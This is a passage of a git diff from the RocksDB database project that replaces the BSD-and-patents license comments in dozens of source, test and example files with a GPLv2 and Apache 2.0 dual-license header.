2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include "db/version_edit.h" diff --git a/db/version_edit.cc b/db/version_edit.cc index ef2ed49fedf..b01f7bbdf70 100644 --- a/db/version_edit.cc +++ b/db/version_edit.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_edit.h b/db/version_edit.h index 72b0522773a..47ebf5b1c76 100644 --- a/db/version_edit.h +++ b/db/version_edit.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_edit_test.cc b/db/version_edit_test.cc index 329dd4da1a1..338bb36f605 100644 --- a/db/version_edit_test.cc +++ b/db/version_edit_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_set.cc b/db/version_set.cc index 849c3cc6306..0069d86c1dd 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_set.h b/db/version_set.h index 17627a4b1d4..5a1f8d07d64 100644 --- a/db/version_set.h +++ b/db/version_set.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_set_test.cc b/db/version_set_test.cc index c8c8541f702..625d4592264 100644 --- a/db/version_set_test.cc +++ b/db/version_set_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/wal_manager.cc b/db/wal_manager.cc index 1ccf153e8c0..7ee2dd0176e 100644 --- a/db/wal_manager.cc +++ b/db/wal_manager.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/wal_manager.h b/db/wal_manager.h index 5339f1c0341..aa62d793bc7 100644 --- a/db/wal_manager.h +++ b/db/wal_manager.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/wal_manager_test.cc b/db/wal_manager_test.cc index f381311062b..9f5cf273d24 100644 --- a/db/wal_manager_test.cc +++ b/db/wal_manager_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/write_batch.cc b/db/write_batch.cc index 8ecf5794fcf..91be9a0dfa6 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/write_batch_base.cc b/db/write_batch_base.cc index d53b07bda32..5522c1ff77f 100644 --- a/db/write_batch_base.cc +++ b/db/write_batch_base.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/write_batch_base.h" diff --git a/db/write_batch_internal.h b/db/write_batch_internal.h index a8ca6096ca7..48a417ce877 100644 --- a/db/write_batch_internal.h +++ b/db/write_batch_internal.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/write_batch_test.cc b/db/write_batch_test.cc index 511fec154bf..388155b6384 100644 --- a/db/write_batch_test.cc +++ b/db/write_batch_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/write_callback.h b/db/write_callback.h index 93c80d65103..6517a7c3aa1 100644 --- a/db/write_callback.h +++ b/db/write_callback.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/db/write_callback_test.cc b/db/write_callback_test.cc index 18727ee6a7f..9edf1c1581e 100644 --- a/db/write_callback_test.cc +++ b/db/write_callback_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/write_controller.cc b/db/write_controller.cc index 699044ec20a..558aa721923 100644 --- a/db/write_controller.cc +++ b/db/write_controller.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/write_controller.h" diff --git a/db/write_controller.h b/db/write_controller.h index c344a74d890..7c301ce7d27 100644 --- a/db/write_controller.h +++ b/db/write_controller.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/db/write_controller_test.cc b/db/write_controller_test.cc index 1b97d622204..a1fe3fa27ea 100644 --- a/db/write_controller_test.cc +++ b/db/write_controller_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include diff --git a/db/write_thread.cc b/db/write_thread.cc index 0938ad28cb1..022f4e64695 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/write_thread.h" #include diff --git a/db/write_thread.h b/db/write_thread.h index c72c95a1185..51bb97f2a8d 100644 --- a/db/write_thread.h +++ b/db/write_thread.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/env/env.cc b/env/env.cc index 8e1d78bfe8b..ae0b111be86 100644 --- a/env/env.cc +++ b/env/env.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/env_chroot.cc b/env/env_chroot.cc index 08b5be65e9e..6a1fda8a834 100644 --- a/env/env_chroot.cc +++ b/env/env_chroot.cc @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #if !defined(ROCKSDB_LITE) && !defined(OS_WIN) diff --git a/env/env_chroot.h b/env/env_chroot.h index 8e513f3b750..b2760bc0a3c 100644 --- a/env/env_chroot.h +++ b/env/env_chroot.h @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/env/env_encryption.cc b/env/env_encryption.cc index 9c9fcd3fcf6..6b688a66020 100644 --- a/env/env_encryption.cc +++ b/env/env_encryption.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/env/env_hdfs.cc b/env/env_hdfs.cc index c0b82b5db4d..d98020c76b3 100644 --- a/env/env_hdfs.cc +++ b/env/env_hdfs.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "rocksdb/env.h" diff --git a/env/env_posix.cc b/env/env_posix.cc index 46fd453bf18..7f2bc3b85dd 100644 --- a/env/env_posix.cc +++ b/env/env_posix.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/env_test.cc b/env/env_test.cc index 4f9028192a9..7fd71a3c430 100644 --- a/env/env_test.cc +++ b/env/env_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/io_posix.cc b/env/io_posix.cc index b6364eb97ec..c5b14d3effe 100644 --- a/env/io_posix.cc +++ b/env/io_posix.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/io_posix.h b/env/io_posix.h index 7d1fc074fd6..69c98438f27 100644 --- a/env/io_posix.h +++ b/env/io_posix.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/mock_env.cc b/env/mock_env.cc index 16cd0a66c2e..79a4f8c44a6 100644 --- a/env/mock_env.cc +++ b/env/mock_env.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/mock_env.h b/env/mock_env.h index d116c3a6a79..ba1e5fa31e7 100644 --- a/env/mock_env.h +++ b/env/mock_env.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/posix_logger.h b/env/posix_logger.h index e3225c0a937..3ec6f574a33 100644 --- a/env/posix_logger.h +++ b/env/posix_logger.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/examples/c_simple_example.c b/examples/c_simple_example.c index 1bdf629d18e..5564361d1e6 100644 --- a/examples/c_simple_example.c +++ b/examples/c_simple_example.c @@ -1,7 +1,7 @@ -// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/examples/column_families_example.cc b/examples/column_families_example.cc index f2dec691eab..589ff8ec294 100644 --- a/examples/column_families_example.cc +++ b/examples/column_families_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include #include diff --git a/examples/compact_files_example.cc b/examples/compact_files_example.cc index 023ae403b7a..c27df8ee79d 100644 --- a/examples/compact_files_example.cc +++ b/examples/compact_files_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // An example code demonstrating how to use CompactFiles, EventListener, // and GetColumnFamilyMetaData APIs to implement custom compaction algorithm. diff --git a/examples/compaction_filter_example.cc b/examples/compaction_filter_example.cc index 8d568a9e329..7a78244a0c6 100644 --- a/examples/compaction_filter_example.cc +++ b/examples/compaction_filter_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/examples/optimistic_transaction_example.cc b/examples/optimistic_transaction_example.cc index d28a305b349..94444e16259 100644 --- a/examples/optimistic_transaction_example.cc +++ b/examples/optimistic_transaction_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/examples/options_file_example.cc b/examples/options_file_example.cc index 360ccddf233..5dd0a479c00 100644 --- a/examples/options_file_example.cc +++ b/examples/options_file_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file demonstrates how to use the utility functions defined in // rocksdb/utilities/options_util.h to open a rocksdb database without diff --git a/examples/simple_example.cc b/examples/simple_example.cc index 57d1b25072d..52fffff5bf7 100644 --- a/examples/simple_example.cc +++ b/examples/simple_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/examples/transaction_example.cc b/examples/transaction_example.cc index 462aada0020..7274cf7ec07 100644 --- a/examples/transaction_example.cc +++ b/examples/transaction_example.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/hdfs/env_hdfs.h b/hdfs/env_hdfs.h index 41fa9881f94..3a62bc8cb92 100644 --- a/hdfs/env_hdfs.h +++ b/hdfs/env_hdfs.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #pragma once diff --git a/include/rocksdb/advanced_options.h b/include/rocksdb/advanced_options.h index 701bcb320a9..6f45134a683 100644 --- a/include/rocksdb/advanced_options.h +++ b/include/rocksdb/advanced_options.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index bee36c47d4e..34364deac09 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -1,8 +1,9 @@ -/* Copyright (c) 2011-present, Facebook, Inc. All rights reserved. - This source code is licensed under the BSD-style license found in the - LICENSE file in the root directory of this source tree. An additional grant - of patent rights can be found in the PATENTS file in the same directory. - Copyright (c) 2011 The LevelDB Authors. All rights reserved. +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). + +/* Copyright (c) 2011 The LevelDB Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/cache.h b/include/rocksdb/cache.h index 5ce24eda1d3..5ebd66bde88 100644 --- a/include/rocksdb/cache.h +++ b/include/rocksdb/cache.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/include/rocksdb/cleanable.h b/include/rocksdb/cleanable.h index 5df5855602b..ecc172b44bb 100644 --- a/include/rocksdb/cleanable.h +++ b/include/rocksdb/cleanable.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/compaction_filter.h b/include/rocksdb/compaction_filter.h index 03016552874..9a8c0318c5d 100644 --- a/include/rocksdb/compaction_filter.h +++ b/include/rocksdb/compaction_filter.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, 